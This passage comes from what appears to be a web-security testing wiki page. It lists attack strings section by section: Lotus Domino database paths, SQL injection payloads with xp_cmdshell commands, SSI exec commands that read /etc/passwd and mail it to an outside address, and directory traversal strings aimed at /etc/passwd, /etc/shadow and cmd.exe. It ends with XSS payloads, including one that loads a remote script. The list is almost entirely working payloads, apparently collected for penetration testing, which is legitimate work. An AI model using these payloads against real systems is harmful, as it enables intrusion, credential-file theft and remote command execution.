/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
